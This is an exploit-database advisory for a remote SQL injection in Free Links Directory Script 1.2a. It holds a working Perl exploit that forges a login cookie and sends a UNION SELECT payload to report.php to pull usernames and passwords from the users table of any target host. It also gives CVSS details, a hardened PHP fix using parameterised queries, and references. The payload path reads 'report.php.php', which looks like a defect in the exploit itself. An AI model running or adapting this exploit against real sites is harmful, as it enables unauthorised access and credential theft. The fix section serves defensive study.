FLDS 1.2a report.php (linkida) Remote SQL Injection Exploit

2009.01.04
Credit: ka0x
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w
#
# Free Links Directory Script V1.2a Remote SQL Injection Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# D.O.M Labs Security Researchers
# - www.domlabs.org -
#
# Vuln code (report.php):
#
# if($_COOKIE['logged']=="")
# {
#     [...] // login
# else {
#     $linkida = $_GET['linkid'];
#     $linkinfo = mysql_fetch_array(mysql_query("select * from links where id=$linkida"))
#     [...]
#

use strict;
use LWP::UserAgent;
use HTTP::Request;

my $host = $ARGV[0];
die "[*] usage: perl $0 <host>\n" unless $ARGV[0];

# prepend the scheme if the user only gave a hostname
if ($host !~ /^http:/){
    $host = 'http://'.$host;
}

my $ua = LWP::UserAgent->new() or die ;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout(10) ;
$ua->default_header('Cookie' => "logged=d0ml4bs"); # value $_COOKIE['logged'], Cookie: logged=d0ml4bs

my $req = HTTP::Request->new(GET => $host."report.php.php?linkid=-1/**/UNION/**/SELECT/**/1,concat(0x5f5f5f5f,0x5b215d20757365723a20,username,0x20205b215d20706173733a20,password,0x5f5f5f5f),3,4,5,6,7,8,9,10,11/**/FROM/**/users");
my $res = $ua->request($req);
my $con = $res->content;

# the injected concat() wraps the result in "____" markers; extract what sits between them
if ($res->is_success && $con =~ m/____(.*?)____/ms){
    print $1;
} else {
    print "[-] exploit failed!\n";
}

__END__
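The two defects the vulnerable snippet above exposes are untrusted input interpolated into SQL (CWE-89) and an access check that only tests the "logged" cookie for a non-empty value. The following is an added example, not code from the advisory or the FLDS project, showing the quoted pattern beside a hardened replacement; it assumes an open mysqli connection in $db and a `links` table with an integer `id` column.

```php
<?php
// --- Vulnerable pattern (as quoted in the advisory) ---
// if($_COOKIE['logged']=="") { [...] // login }
// else {
//     $linkida  = $_GET['linkid'];
//     $linkinfo = mysql_fetch_array(mysql_query("select * from links where id=$linkida"));
// }
// Any client can set Cookie: logged=anything, and linkid goes straight into the query.

// --- Hardened replacement (assumes $db is a connected mysqli instance) ---
function fetch_link(mysqli $db, string $rawLinkId): ?array
{
    // Reject anything that is not a plain positive integer before it reaches SQL;
    // "-1/**/UNION/**/SELECT..." style values never get past this check.
    if (!preg_match('/^[1-9][0-9]*$/', $rawLinkId)) {
        return null;
    }
    $linkId = (int) $rawLinkId;

    // Parameterised query: the value is bound as an integer, never interpolated,
    // so even a malformed value could not change the statement's structure.
    $stmt = $db->prepare('SELECT * FROM links WHERE id = ?');
    $stmt->bind_param('i', $linkId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// Authorisation must come from server-side session state set at login,
// not from a cookie whose value the client chooses.
session_start();
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('login required');
}

$linkinfo = fetch_link($db, $_GET['linkid'] ?? '');
if ($linkinfo === null) {
    http_response_code(404);
    exit('no such link');
}
```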

References:

http://xforce.iss.net/xforce/xfdb/47377
http://www.securityfocus.com/bid/32859
http://www.milw0rm.com/exploits/7489
http://secunia.com/advisories/33075
http://osvdb.org/50724


Copyright 2024, cxsecurity.com